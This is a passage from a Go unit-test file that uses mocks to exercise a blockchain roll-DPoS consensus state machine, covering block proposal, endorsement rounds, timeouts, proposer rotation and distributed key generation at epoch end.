require.Equal(eEndorseProposalTimeout, evt.Type()) s, err = cfsm.handleEndorseProposalTimeout(evt) require.NoError(err) require.Equal(sAcceptLockEndorse, s) evt = <-cfsm.evtq require.Equal(eEndorseLockTimeout, evt.Type()) s, err = cfsm.handleEndorseLockTimeout(evt) require.NoError(err) require.Equal(sRoundStart, s) }) } func TestHandleInitBlockEvt(t *testing.T) { t.Parallel() ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 21) test21Addrs := test21Addrs() for i, addr := range test21Addrs { delegates[i] = addr.RawAddress } cfsm := newTestCFSM( t, test21Addrs[2], test21Addrs[2], ctrl, delegates, nil, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(2) }, clock.New(), ) cfsm.ctx.epoch.numSubEpochs = uint(2) cfsm.ctx.round = roundCtx{ endorsementSets: make(map[hash.Hash32B]*endorsement.Set), proposer: delegates[2], } t.Run("secret-block", func(t *testing.T) { cfsm.ctx.epoch.subEpochNum = uint64(0) s, err := cfsm.handleInitBlockProposeEvt(cfsm.newCEvt(eInitBlockPropose)) require.NoError(t, err) require.Equal(t, sAcceptPropose, s) e := <-cfsm.evtq require.Equal(t, eProposeBlock, e.Type()) pbe, ok := e.(*proposeBlkEvt) require.True(t, ok) require.NotNil(t, pbe.block) require.Equal(t, len(delegates), len(pbe.block.SecretProposals)) require.NotNil(t, pbe.block.SecretWitness) }) t.Run("normal-block", func(t *testing.T) { cfsm.ctx.epoch.subEpochNum = uint64(1) s, err := cfsm.handleInitBlockProposeEvt(cfsm.newCEvt(eInitBlockPropose)) require.NoError(t, err) require.Equal(t, sAcceptPropose, s) e := <-cfsm.evtq require.Equal(t, eProposeBlock, e.Type()) pbe, ok := e.(*proposeBlkEvt) require.True(t, ok) require.NotNil(t, pbe.block) transfers, votes, _ := action.ClassifyActions(pbe.block.Actions) require.Equal(t, 1, len(transfers)) require.Equal(t, 1, len(votes)) }) } func TestHandleProposeBlockEvt(t *testing.T) { t.Parallel() ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 4) for i := 0; i < 4; i++ { delegates[i] = testAddrs[i].RawAddress } epoch := epochCtx{ delegates: delegates, num: uint64(1), height: uint64(1), numSubEpochs: uint(1), } round := roundCtx{ height: 2, number: 0, endorsementSets: make(map[hash.Hash32B]*endorsement.Set), proposer: delegates[2], } t.Run("pass-validation", func(t *testing.T) { cfsm := newTestCFSM( t, 
testAddrs[0], testAddrs[2], ctrl, delegates, nil, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(1) }, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round blk, err := cfsm.ctx.mintCommonBlock() assert.NoError(t, err) state, err := cfsm.handleProposeBlockEvt(newProposeBlkEvt(blk, nil, cfsm.ctx.round.number, cfsm.ctx.clock)) assert.NoError(t, err) assert.Equal(t, sAcceptProposalEndorse, state) e := <-cfsm.evtq evt, ok := e.(*endorseEvt) require.True(t, ok) assert.Equal(t, eEndorseProposal, evt.Type()) }) t.Run("pass-validation-time-rotation", func(t *testing.T) { clock := clock.NewMock() cfsm := newTestCFSM( t, testAddrs[0], testAddrs[2], ctrl, delegates, nil, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(2) }, clock, ) cfsm.ctx.cfg.TimeBasedRotation = true cfsm.ctx.cfg.ProposerInterval = 10 * time.Second cfsm.ctx.epoch = epoch cfsm.ctx.round = round clock.Add(11 * time.Second) blk, err := cfsm.ctx.mintCommonBlock() assert.NoError(t, err) state, err := cfsm.handleProposeBlockEvt(newProposeBlkEvt(blk, nil, cfsm.ctx.round.number, cfsm.ctx.clock)) assert.NoError(t, err) assert.Equal(t, sAcceptProposalEndorse, state) e := <-cfsm.evtq evt, ok := e.(*endorseEvt) require.True(t, ok) assert.Equal(t, eEndorseProposal, evt.Type()) clock.Add(10 * time.Second) state, err = cfsm.handleStartRoundEvt(cfsm.newCEvt(eStartRound)) assert.Equal(t, sBlockPropose, state) assert.NoError(t, err) e = <-cfsm.evtq cevt, ok := e.(*consensusEvt) require.True(t, ok) assert.Equal(t, eInitBlockPropose, cevt.Type()) blk.Header.Pubkey = testAddrs[3].PublicKey err = blk.SignBlock(testAddrs[3]) assert.NoError(t, err) state, err = cfsm.handleProposeBlockEvt(newProposeBlkEvt(blk, nil, cfsm.ctx.round.number, cfsm.ctx.clock)) assert.NoError(t, err) assert.Equal(t, sAcceptProposalEndorse, state) <-cfsm.evtq require.True(t, ok) assert.Equal(t, eEndorseProposal, evt.Type()) }) t.Run("fail-validation", func(t *testing.T) { cfsm := newTestCFSM( t, testAddrs[0], testAddrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().ValidateBlock(gomock.Any(), gomock.Any()).Return(errors.New("mock error")).Times(1) }, nil, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round blk, err := cfsm.ctx.mintCommonBlock() assert.NoError(t, err) state, err := cfsm.handleProposeBlockEvt(newProposeBlkEvt(blk, nil, cfsm.ctx.round.number, cfsm.ctx.clock)) assert.NoError(t, err) assert.Equal(t, sAcceptPropose, state) }) t.Run("skip-validation", func(t *testing.T) { cfsm := newTestCFSM( t, testAddrs[2], testAddrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().ValidateBlock(gomock.Any(), gomock.Any()).Times(0) }, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(1) }, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round blk, err := cfsm.ctx.mintCommonBlock() assert.NoError(t, err) state, err := cfsm.handleProposeBlockEvt(newProposeBlkEvt(blk, nil, cfsm.ctx.round.number, cfsm.ctx.clock)) assert.NoError(t, err) assert.Equal(t, sAcceptProposalEndorse, state) e := <-cfsm.evtq evt, ok := e.(*endorseEvt) require.True(t, ok) assert.Equal(t, eEndorseProposal, evt.Type()) }) t.Run("invalid-proposer", func(t *testing.T) { cfsm := newTestCFSM( t, testAddrs[2], testAddrs[3], ctrl, delegates, nil, nil, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round blk, err := cfsm.ctx.mintCommonBlock() 
assert.NoError(t, err) state, err := cfsm.handleProposeBlockEvt(newProposeBlkEvt(blk, nil, cfsm.ctx.round.number, cfsm.ctx.clock)) assert.NoError(t, err) assert.Equal(t, sAcceptPropose, state) state, err = cfsm.handleProposeBlockTimeout(cfsm.newCEvt(eProposeBlockTimeout)) assert.NoError(t, err) assert.Equal(t, sAcceptProposalEndorse, state) }) t.Run("invalid-proposer-time-rotation", func(t *testing.T) { clock := clock.NewMock() cfsm := newTestCFSM( t, testAddrs[2], testAddrs[3], ctrl, delegates, nil, nil, clock, ) cfsm.ctx.cfg.TimeBasedRotation = true cfsm.ctx.cfg.ProposerInterval = 10 * time.Second cfsm.ctx.epoch = epoch cfsm.ctx.round = round clock.Add(11 * time.Second) blk, err := cfsm.ctx.mintCommonBlock() assert.NoError(t, err) state, err := cfsm.handleProposeBlockEvt(newProposeBlkEvt(blk, nil, cfsm.ctx.round.number, cfsm.ctx.clock)) assert.NoError(t, err) assert.Equal(t, sAcceptPropose, state) state, err = cfsm.handleProposeBlockTimeout(cfsm.newCEvt(eProposeBlockTimeout)) assert.NoError(t, err) assert.Equal(t, sAcceptProposalEndorse, state) }) t.Run("timeout", func(t *testing.T) { cfsm := newTestCFSM( t, testAddrs[2], testAddrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().ValidateBlock(gomock.Any(), gomock.Any()).Times(0) }, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(0) }, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round state, err := cfsm.handleProposeBlockTimeout(cfsm.newCEvt(eProposeBlockTimeout)) assert.NoError(t, err) assert.Equal(t, sAcceptProposalEndorse, state) }) } func TestHandleProposalEndorseEvt(t *testing.T) { t.Parallel() ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 4) for i := 0; i < 4; i++ { delegates[i] = testAddrs[i].RawAddress } epoch := epochCtx{ delegates: delegates, num: uint64(1), height: uint64(1), numSubEpochs: uint(1), } round := roundCtx{ endorsementSets: make(map[hash.Hash32B]*endorsement.Set), proposer: delegates[2], } t.Run("gather-endorses", func(t *testing.T) { cfsm := newTestCFSM( t, testAddrs[0], testAddrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) chain.EXPECT().ChainAddress().AnyTimes().Return(config.Default.Chain.Address) }, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(1) }, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round blk, err := cfsm.ctx.mintCommonBlock() assert.NoError(t, err) cfsm.ctx.round.block = blk // First endorse prepare eEvt := newEndorseEvt(endorsement.PROPOSAL, blk.HashBlock(), round.height, round.number, testAddrs[0], cfsm.ctx.clock) state, err := cfsm.handleEndorseProposalEvt(eEvt) assert.NoError(t, err) assert.Equal(t, sAcceptProposalEndorse, state) // Second endorse prepare eEvt = newEndorseEvt(endorsement.PROPOSAL, blk.HashBlock(), round.height, round.number, testAddrs[1], cfsm.ctx.clock) state, err = cfsm.handleEndorseProposalEvt(eEvt) assert.NoError(t, err) assert.Equal(t, sAcceptProposalEndorse, state) // Third endorse prepare, could move on eEvt = newEndorseEvt(endorsement.PROPOSAL, blk.HashBlock(), round.height, round.number, testAddrs[2], cfsm.ctx.clock) state, err = cfsm.handleEndorseProposalEvt(eEvt) assert.NoError(t, err) assert.Equal(t, sAcceptLockEndorse, state) e := <-cfsm.evtq evt, ok := e.(*endorseEvt) require.True(t, ok) assert.Equal(t, eEndorseLock, evt.Type()) }) t.Run("timeout", func(t *testing.T) { 
cfsm := newTestCFSM( t, testAddrs[0], testAddrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) chain.EXPECT().ChainAddress().AnyTimes().Return(config.Default.Chain.Address) }, nil, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round blk, err := cfsm.ctx.mintCommonBlock() assert.NoError(t, err) cfsm.ctx.round.block = blk state, err := cfsm.handleEndorseProposalTimeout(cfsm.newCEvt(eEndorseProposalTimeout)) assert.NoError(t, err) assert.Equal(t, sAcceptLockEndorse, state) }) } func TestHandleCommitEndorseEvt(t *testing.T) { t.Parallel() ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 21) test21Addrs := test21Addrs() for i, addr := range test21Addrs { delegates[i] = addr.RawAddress } round := roundCtx{ endorsementSets: make(map[hash.Hash32B]*endorsement.Set), proposer: delegates[2], } t.Run("gather-commits-secret-block", func(t *testing.T) { cfsm := newTestCFSM( t, test21Addrs[0], test21Addrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().CommitBlock(gomock.Any()).Return(nil).Times(1) chain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) chain.EXPECT().ChainAddress().AnyTimes().Return(config.Default.Chain.Address) }, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(2) }, clock.New(), ) cfsm.ctx.epoch.numSubEpochs = uint(2) cfsm.ctx.epoch.subEpochNum = uint64(0) cfsm.ctx.epoch.delegates = delegates cfsm.ctx.epoch.committedSecrets = make(map[string][]uint32) cfsm.ctx.round = round blk, err := cfsm.ctx.mintBlock() assert.NoError(t, err) cfsm.ctx.round.block = blk for i := 0; i < 14; i++ { eEvt := newEndorseEvt(endorsement.LOCK, blk.HashBlock(), round.height, round.number, test21Addrs[i], cfsm.ctx.clock) state, err := cfsm.handleEndorseLockEvt(eEvt) assert.NoError(t, err) assert.Equal(t, sAcceptLockEndorse, state) assert.Equal(t, 0, len(cfsm.ctx.epoch.committedSecrets)) } // 15th endorse prepare, could move on eEvt := newEndorseEvt(endorsement.LOCK, blk.HashBlock(), round.height, round.number, test21Addrs[14], cfsm.ctx.clock) state, err := cfsm.handleEndorseLockEvt(eEvt) assert.NoError(t, err) assert.Equal(t, sAcceptCommitEndorse, state) evt := <-cfsm.evtq assert.Equal(t, eEndorseCommit, evt.Type()) state, err = cfsm.handleEndorseCommitEvt(evt) assert.NoError(t, err) assert.Equal(t, sRoundStart, state) assert.Equal(t, eFinishEpoch, (<-cfsm.evtq).Type()) assert.Equal(t, 1, len(cfsm.ctx.epoch.committedSecrets)) }) t.Run("gather-commits-common-block", func(t *testing.T) { cfsm := newTestCFSM( t, test21Addrs[0], test21Addrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().CommitBlock(gomock.Any()).Return(nil).Times(1) chain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) chain.EXPECT().ChainAddress().AnyTimes().Return(config.Default.Chain.Address) }, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(2) }, clock.New(), ) cfsm.ctx.epoch.numSubEpochs = uint(2) cfsm.ctx.epoch.subEpochNum = uint64(1) cfsm.ctx.epoch.delegates = delegates cfsm.ctx.round = round blk, err := cfsm.ctx.mintBlock() assert.NoError(t, err) cfsm.ctx.round.block = blk for i := 0; i < 14; i++ { eEvt := newEndorseEvt(endorsement.LOCK, blk.HashBlock(), round.height, round.number, test21Addrs[i], cfsm.ctx.clock) state, err := cfsm.handleEndorseLockEvt(eEvt) assert.NoError(t, err) assert.Equal(t, 
sAcceptLockEndorse, state) } // 15th endorse prepare, could move on eEvt := newEndorseEvt(endorsement.LOCK, blk.HashBlock(), round.height, round.number, test21Addrs[14], cfsm.ctx.clock) state, err := cfsm.handleEndorseLockEvt(eEvt) assert.NoError(t, err) assert.Equal(t, sAcceptCommitEndorse, state) evt := <-cfsm.evtq assert.Equal(t, eEndorseCommit, evt.Type()) state, err = cfsm.handleEndorseCommitEvt(evt) assert.NoError(t, err) assert.Equal(t, sRoundStart, state) assert.Equal(t, eFinishEpoch, (<-cfsm.evtq).Type()) }) t.Run("timeout-blocking", func(t *testing.T) { cfsm := newTestCFSM( t, test21Addrs[0], test21Addrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().CommitBlock(gomock.Any()).Return(nil).Times(0) chain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) chain.EXPECT().ChainAddress().AnyTimes().Return(config.Default.Chain.Address) }, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(0) }, clock.New(), ) blk, err := cfsm.ctx.mintBlock() assert.NoError(t, err) cfsm.ctx.round.block = blk state, err := cfsm.handleEndorseLockTimeout(cfsm.newCEvt(eEndorseLockTimeout)) assert.NoError(t, err) assert.Equal(t, sRoundStart, state) assert.Equal(t, eFinishEpoch, (<-cfsm.evtq).Type()) }) } func TestOneDelegate(t *testing.T) { require := require.New(t) ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := []string{testAddrs[0].RawAddress} epoch := epochCtx{ delegates: delegates, num: uint64(1), height: uint64(1), numSubEpochs: uint(1), } round := roundCtx{ height: 2, endorsementSets: make(map[hash.Hash32B]*endorsement.Set), proposer: delegates[0], } cfsm := newTestCFSM( t, testAddrs[0], testAddrs[0], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().CommitBlock(gomock.Any()).Return(nil).Times(1) chain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) chain.EXPECT().TipHeight().Return(uint64(2)).Times(1) }, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(4) }, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round cfsm.ctx.cfg.EnableDKG = false // propose block blk, err := cfsm.ctx.mintCommonBlock() require.NoError(err) state, err := cfsm.handleProposeBlockEvt(newProposeBlkEvt(blk, nil, cfsm.ctx.round.number, cfsm.ctx.clock)) require.Equal(sAcceptProposalEndorse, state) require.NoError(err) evt := <-cfsm.evtq eEvt, ok := evt.(*endorseEvt) require.True(ok) require.Equal(eEndorseProposal, eEvt.Type()) // endorse proposal state, err = cfsm.handleEndorseProposalEvt(eEvt) require.Equal(sAcceptLockEndorse, state) require.NoError(err) evt = <-cfsm.evtq eEvt, ok = evt.(*endorseEvt) require.True(ok) require.Equal(eEndorseLock, eEvt.Type()) // endorse lock state, err = cfsm.handleEndorseLockEvt(eEvt) require.NoError(err) require.Equal(sAcceptCommitEndorse, state) evt = <-cfsm.evtq eEvt, ok = evt.(*endorseEvt) require.True(ok) require.Equal(eEndorseCommit, eEvt.Type()) // endorse commit state, err = cfsm.handleEndorseCommitEvt(eEvt) require.NoError(err) require.Equal(sRoundStart, state) evt = <-cfsm.evtq cEvt, ok := evt.(*consensusEvt) require.True(ok) require.Equal(eFinishEpoch, cEvt.Type()) // new round state, err = cfsm.handleFinishEpochEvt(cEvt) require.Equal(sEpochStart, state) require.NoError(err) } func TestTwoDelegates(t *testing.T) { require := require.New(t) ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := []string{testAddrs[0].RawAddress, testAddrs[1].RawAddress} 
epoch := epochCtx{ delegates: delegates, num: uint64(1), height: uint64(1), numSubEpochs: uint(2), } round := roundCtx{ height: 2, endorsementSets: make(map[hash.Hash32B]*endorsement.Set), proposer: delegates[0], } cfsm := newTestCFSM( t, testAddrs[0], testAddrs[0], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().CommitBlock(gomock.Any()).Return(nil).Times(1) chain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) chain.EXPECT().TipHeight().Return(uint64(2)).Times(2) }, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(4) }, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round cfsm.ctx.cfg.EnableDKG = false // propose block blk, err := cfsm.ctx.mintCommonBlock() require.NoError(err) state, err := cfsm.handleProposeBlockEvt(newProposeBlkEvt(blk, nil, cfsm.ctx.round.number, cfsm.ctx.clock)) require.Equal(sAcceptProposalEndorse, state) require.NoError(err) evt := <-cfsm.evtq eEvt, ok := evt.(*endorseEvt) require.True(ok) require.Equal(eEndorseProposal, eEvt.Type()) // endorse proposal state, err = cfsm.handleEndorseProposalEvt(eEvt) require.Equal(sAcceptProposalEndorse, state) require.NoError(err) eEvt = newEndorseEvt(endorsement.PROPOSAL, blk.HashBlock(), round.height, round.number, testAddrs[1], cfsm.ctx.clock) state, err = cfsm.handleEndorseProposalEvt(eEvt) require.Equal(sAcceptLockEndorse, state) require.NoError(err) evt = <-cfsm.evtq eEvt, ok = evt.(*endorseEvt) require.True(ok) require.Equal(eEndorseLock, eEvt.Type()) // endorse lock state, err = cfsm.handleEndorseLockEvt(eEvt) require.Equal(sAcceptLockEndorse, state) require.NoError(err) eEvt = newEndorseEvt(endorsement.LOCK, blk.HashBlock(), round.height, round.number, testAddrs[1], cfsm.ctx.clock) state, err = cfsm.handleEndorseLockEvt(eEvt) require.Equal(sAcceptCommitEndorse, state) require.NoError(err) evt = <-cfsm.evtq eEvt, ok = evt.(*endorseEvt) require.True(ok) require.Equal(eEndorseCommit, eEvt.Type()) // endorse lock state, err = cfsm.handleEndorseCommitEvt(eEvt) require.NoError(err) require.Equal(sRoundStart, state) evt = <-cfsm.evtq cEvt, ok := evt.(*consensusEvt) require.True(ok) require.Equal(eFinishEpoch, cEvt.Type()) // new round state, err = cfsm.handleFinishEpochEvt(cEvt) require.Equal(sRoundStart, state) require.NoError(err) } func TestThreeDelegates(t *testing.T) { require := require.New(t) ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := []string{testAddrs[0].RawAddress, testAddrs[1].RawAddress, testAddrs[2].RawAddress} epoch := epochCtx{ delegates: delegates, num: uint64(1), height: uint64(1), numSubEpochs: uint(3), } round := roundCtx{ height: 2, endorsementSets: make(map[hash.Hash32B]*endorsement.Set), proposer: delegates[2], } cfsm := newTestCFSM( t, testAddrs[0], testAddrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().CommitBlock(gomock.Any()).Return(nil).Times(1) chain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) chain.EXPECT().TipHeight().Return(uint64(2)).Times(2) }, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(3) }, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round cfsm.ctx.cfg.EnableDKG = false blk, err := cfsm.ctx.mintCommonBlock() require.NoError(err) cfsm.ctx.round.block = blk // endorse proposal // handle self endorsement eEvt := newEndorseEvt(endorsement.PROPOSAL, blk.HashBlock(), round.height, round.number, testAddrs[0], cfsm.ctx.clock) state, err := 
cfsm.handleEndorseProposalEvt(eEvt) require.Equal(sAcceptProposalEndorse, state) require.NoError(err) // handle delegate 1's endorsement eEvt = newEndorseEvt(endorsement.PROPOSAL, blk.HashBlock(), round.height, round.number, testAddrs[1], cfsm.ctx.clock) state, err = cfsm.handleEndorseProposalEvt(eEvt) require.Equal(sAcceptProposalEndorse, state) require.NoError(err) // handle delegate 2's endorsement eEvt = newEndorseEvt(endorsement.PROPOSAL, blk.HashBlock(), round.height, round.number, testAddrs[2], cfsm.ctx.clock) state, err = cfsm.handleEndorseProposalEvt(eEvt) require.Equal(sAcceptLockEndorse, state) require.NoError(err) evt := <-cfsm.evtq eEvt, ok := evt.(*endorseEvt) require.True(ok) require.Equal(eEndorseLock, eEvt.Type()) // endorse lock // handle self endorsement state, err = cfsm.handleEndorseLockEvt(eEvt) require.Equal(sAcceptLockEndorse, state) require.NoError(err) // handle delegate 1's endorsement eEvt = newEndorseEvt(endorsement.LOCK, blk.HashBlock(), round.height, round.number, testAddrs[1], cfsm.ctx.clock) state, err = cfsm.handleEndorseLockEvt(eEvt) require.Equal(sAcceptLockEndorse, state) require.NoError(err) // handle delegate 2's endorsement eEvt = newEndorseEvt(endorsement.LOCK, blk.HashBlock(), round.height, round.number, testAddrs[2], cfsm.ctx.clock) state, err = cfsm.handleEndorseLockEvt(eEvt) require.NoError(err) require.Equal(sAcceptCommitEndorse, state) evt = <-cfsm.evtq eEvt, ok = evt.(*endorseEvt) require.True(ok) require.Equal(eEndorseCommit, eEvt.Type()) state, err = cfsm.handleEndorseCommitEvt(eEvt) require.NoError(err) require.Equal(sRoundStart, state) evt = <-cfsm.evtq cEvt, ok := evt.(*consensusEvt) require.True(ok) require.Equal(eFinishEpoch, cEvt.Type()) // new round state, err = cfsm.handleFinishEpochEvt(cEvt) require.Equal(sRoundStart, state) require.NoError(err) } func TestHandleFinishEpochEvt(t *testing.T) { t.Parallel() ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 21) test21Addrs := test21Addrs() for i, addr := range test21Addrs { delegates[i] = addr.RawAddress } epoch := epochCtx{ delegates: delegates, num: uint64(1), height: uint64(1), numSubEpochs: uint(2), } round := roundCtx{ endorsementSets: make(map[hash.Hash32B]*endorsement.Set), proposer: delegates[2], } t.Run("dkg-not-finished", func(t *testing.T) { cfsm := newTestCFSM( t, test21Addrs[0], test21Addrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().TipHeight().Return(uint64(1)).Times(3) }, nil, clock.New(), ) epoch.subEpochNum = uint64(0) cfsm.ctx.epoch = epoch cfsm.ctx.round = round state, err := cfsm.handleFinishEpochEvt(cfsm.newCEvt(eFinishEpoch)) assert.NoError(t, err) assert.Equal(t, sRoundStart, state) assert.Equal(t, eStartRound, (<-cfsm.evtq).Type()) assert.Nil(t, cfsm.ctx.epoch.dkgAddress.PublicKey) assert.Nil(t, cfsm.ctx.epoch.dkgAddress.PrivateKey) }) t.Run("dkg-finished", func(t *testing.T) { cfsm := newTestCFSM( t, test21Addrs[0], test21Addrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().TipHeight().Return(uint64(21)).Times(3) }, nil, clock.New(), ) epoch.subEpochNum = uint64(0) epoch.committedSecrets = make(map[string][]uint32) cfsm.ctx.epoch = epoch cfsm.ctx.round = round idList := make([][]uint8, 0) for _, addr := range delegates { dkgID := iotxaddress.CreateID(addr) idList = append(idList, dkgID) } for i, delegate := range delegates { _, secrets, _, err := crypto.DKG.Init(crypto.DKG.SkGeneration(), idList) assert.NoError(t, err) assert.NotNil(t, secrets) if i%2 != 0 { 
cfsm.ctx.epoch.committedSecrets[delegate] = secrets[0] } } state, err := cfsm.handleFinishEpochEvt(cfsm.newCEvt(eFinishEpoch)) assert.NoError(t, err) assert.Equal(t, sRoundStart, state) assert.Equal(t, eStartRound, (<-cfsm.evtq).Type()) assert.NotNil(t, cfsm.ctx.epoch.dkgAddress.PublicKey) assert.NotNil(t, cfsm.ctx.epoch.dkgAddress.PrivateKey) }) t.Run("epoch-not-finished", func(t *testing.T) { cfsm := newTestCFSM( t, test21Addrs[0], test21Addrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().TipHeight().Return(uint64(22)).Times(2) }, nil, clock.New(), ) epoch.subEpochNum = uint64(1) cfsm.ctx.epoch = epoch cfsm.ctx.round = round state, err := cfsm.handleFinishEpochEvt(cfsm.newCEvt(eFinishEpoch)) assert.NoError(t, err) assert.Equal(t, sRoundStart, state) assert.Equal(t, eStartRound, (<-cfsm.evtq).Type()) }) t.Run("epoch-finished", func(t *testing.T) { cfsm := newTestCFSM( t, test21Addrs[0], test21Addrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().TipHeight().Return(uint64(42)).Times(1) chain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) chain.EXPECT().ChainAddress().AnyTimes().Return(config.Default.Chain.Address) }, nil, clock.New(), ) epoch.subEpochNum = uint64(1) cfsm.ctx.epoch = epoch cfsm.ctx.round = round state, err := cfsm.handleFinishEpochEvt(cfsm.newCEvt(eFinishEpoch)) assert.NoError(t, err) assert.Equal(t, sEpochStart, state) assert.Equal(t, eRollDelegates, (<-cfsm.evtq).Type()) }) } func newTestCFSM( t *testing.T, addr *iotxaddress.Address, proposer *iotxaddress.Address, ctrl *gomock.Controller, delegates []string, mockChain func(*mock_blockchain.MockBlockchain), mockP2P func(*mock_network.MockOverlay), clock clock.Clock, ) *cFSM { transfer, err := action.NewTransfer(1, big.NewInt(100), "src", "dst", []byte{}, uint64(100000), big.NewInt(10)) require.NoError(t, err) selfPubKey := testaddress.Addrinfo["producer"].PublicKey require.NoError(t, err) selfPubKeyHash := keypair.HashPubKey(selfPubKey) address := address.New(config.Default.Chain.ID, selfPubKeyHash[:]) vote, err := action.NewVote(2, address.IotxAddress(), address.IotxAddress(), uint64(100000), big.NewInt(10)) require.NoError(t, err) var prevHash hash.Hash32B lastBlk := blockchain.NewBlock( config.Default.Chain.ID, 1, prevHash, testutil.TimestampNowFromClock(clock), proposer.PublicKey, make([]action.Action, 0), ) blkToMint := blockchain.NewBlock( config.Default.Chain.ID, 2, lastBlk.HashBlock(), testutil.TimestampNowFromClock(clock), proposer.PublicKey, []action.Action{transfer, vote}, ) blkToMint.SignBlock(proposer) var secretBlkToMint *blockchain.Block var proposerSecrets [][]uint32 var proposerWitness [][]byte if len(delegates) == 21 { idList := make([][]uint8, 0) for _, addr := range delegates { dkgID := iotxaddress.CreateID(addr) idList = append(idList, dkgID) } _, secrets, witness, err := crypto.DKG.Init(crypto.DKG.SkGeneration(), idList) require.NoError(t, err) proposerSecrets = secrets proposerWitness = witness nonce := uint64(1) secretProposals := make([]*action.SecretProposal, 0) for i, delegate := range delegates { secretProposal, err := action.NewSecretProposal(nonce, proposer.RawAddress, delegate, secrets[i]) require.NoError(t, err) secretProposals = append(secretProposals, secretProposal) nonce++ } secretWitness, err := action.NewSecretWitness(nonce, proposer.RawAddress, witness) require.NoError(t, err) secretBlkToMint = blockchain.NewSecretBlock( config.Default.Chain.ID, 2, lastBlk.HashBlock(), 
testutil.TimestampNowFromClock(clock), proposer.PublicKey, secretProposals, secretWitness, ) secretBlkToMint.SignBlock(proposer) } ctx := makeTestRollDPoSCtx( addr, ctrl, config.RollDPoS{ AcceptProposeTTL: 300 * time.Millisecond, AcceptProposalEndorseTTL: 300 * time.Millisecond, AcceptCommitEndorseTTL: 300 * time.Millisecond, EventChanSize: 2, NumDelegates: uint(len(delegates)), EnableDKG: true, }, func(blockchain *mock_blockchain.MockBlockchain) { blockchain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) blockchain.EXPECT().ChainAddress().AnyTimes().Return(config.Default.Chain.Address) blockchain.EXPECT().GetBlockByHeight(uint64(1)).Return(lastBlk, nil).AnyTimes() blockchain.EXPECT().GetBlockByHeight(uint64(2)).Return(lastBlk, nil).AnyTimes() blockchain.EXPECT().GetBlockByHeight(uint64(21)).Return(lastBlk, nil).AnyTimes() blockchain.EXPECT().GetBlockByHeight(uint64(22)).Return(lastBlk, nil).AnyTimes() blockchain.EXPECT(). MintNewBlock(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(blkToMint, 